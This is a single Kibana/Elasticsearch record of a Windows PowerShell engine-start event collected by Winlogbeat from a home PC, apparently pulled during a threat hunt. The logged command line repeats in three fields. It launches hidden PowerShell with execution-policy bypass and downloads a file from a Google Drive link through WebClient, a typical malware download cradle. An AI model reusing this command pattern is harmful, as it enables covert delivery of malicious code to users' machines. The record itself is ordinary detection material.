  1. {
  2.   "_index": "access-logs-2020.02.21_new_2",
  3.   "_type": "doc",
  4.   "_id": "U2EjZXABZmYPUeY3xrRB",
  5.   "_version": 1,
  6.   "_score": null,
  7.   "_source": {
  8.     "host": {
  9.       "name": "Richard-New-PC",
  10.       "hostname": "Richard-New-PC",
  11.       "id": "2c4f78bc-20ab-4f82-9817-49868bc59a1e",
  12.       "architecture": "x86_64",
  13.       "os": {
  14.         "name": "Windows 10 Home",
  15.         "platform": "windows",
  16.         "kernel": "10.0.18362.657 (WinBuild.160101.0800)",
  17.         "build": "18362.657",
  18.         "version": "10.0",
  19.         "family": "windows"
  20.       }
  21.     },
  22.     "message": "Engine state is changed from None to Available. \n\nDetails: \n\tNewEngineState=Available\n\tPreviousEngineState=None\n\n\tSequenceNumber=13\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.18362.628\n\tHostId=3dd1a50a-cc15-45e0-bf63-4456d556fb67\n\tHostApplication=powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export=download\n\tEngineVersion=5.1.18362.628\n\tRunspaceId=de762b62-056c-4be1-90bf-a12cfe6fbc72\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine=",
  23.     "agent": {
  24.       "type": "winlogbeat",
  25.       "hostname": "Richard-New-PC",
  26.       "ephemeral_id": "b1060e1e-c51b-4879-9d2b-67e80ed520f8",
  27.       "id": "796f9b7c-31aa-4dee-ae62-c6cecc5e37f9",
  28.       "version": "7.5.2"
  29.     },
  30.     "@timestamp": "2020-02-21T00:26:46.987Z",
  31.     "log": {
  32.       "level": "information"
  33.     },
  34.     "ecs": {
  35.       "version": "1.1.0"
  36.     },
  37.     "event": {
  38.       "kind": "event",
  39.       "provider": "PowerShell",
  40.       "action": "Engine Lifecycle",
  41.       "code": 400,
  42.       "created": "2020-02-21T00:26:47.650Z"
  43.     },
  44.     "@version": "1",
  45.     "winlog": {
  46.       "event_data": {
  47.         "param2": "None",
  48.         "param1": "Available",
  49.         "param3": "\tNewEngineState=Available\n\tPreviousEngineState=None\n\n\tSequenceNumber=13\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.18362.628\n\tHostId=3dd1a50a-cc15-45e0-bf63-4456d556fb67\n\tHostApplication=powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export=download\n\tEngineVersion=5.1.18362.628\n\tRunspaceId=de762b62-056c-4be1-90bf-a12cfe6fbc72\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine="
  50.       },
  51.       "computer_name": "Richard-New-PC",
  52.       "channel": "Windows PowerShell",
  53.       "opcode": "Info",
  54.       "record_id": 652,
  55.       "task": "Engine Lifecycle",
  56.       "event_id": 400,
  57.       "keywords": [
  58.         "Classic"
  59.       ],
  60.       "provider_name": "PowerShell",
  61.       "api": "wineventlog"
  62.     },
  63.     "tags": [
  64.       "beats_input_codec_plain_applied"
  65.     ]
  66.   },
  67.   "fields": {
  68.     "@timestamp": [
  69.       "2020-02-21T00:26:46.987Z"
  70.     ],
  71.     "event.created": [
  72.       "2020-02-21T00:26:47.650Z"
  73.     ]
  74.   },
  75.   "highlight": {
  76.     "message": [
  77.       "Details: \n\tNewEngineState=Available\n\tPreviousEngineState=None\n\n\tSequenceNumber=13\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.18362.628\n\tHostId=3dd1a50a-cc15-45e0-bf63-4456d556fb67\n\tHostApplication=powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object @kibana-highlighted-field@System.Net.WebClient@/kibana-highlighted-field@).DownloadFile('https://drive.google.com/uc?export=download\n\tEngineVersion=5.1.18362.628\n\tRunspaceId=de762b62-056c-4be1-90bf-a12cfe6fbc72\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine="
  78.     ]
  79.   },
  80.   "sort": [
  81.     1582244806987
  82.   ]
  83. }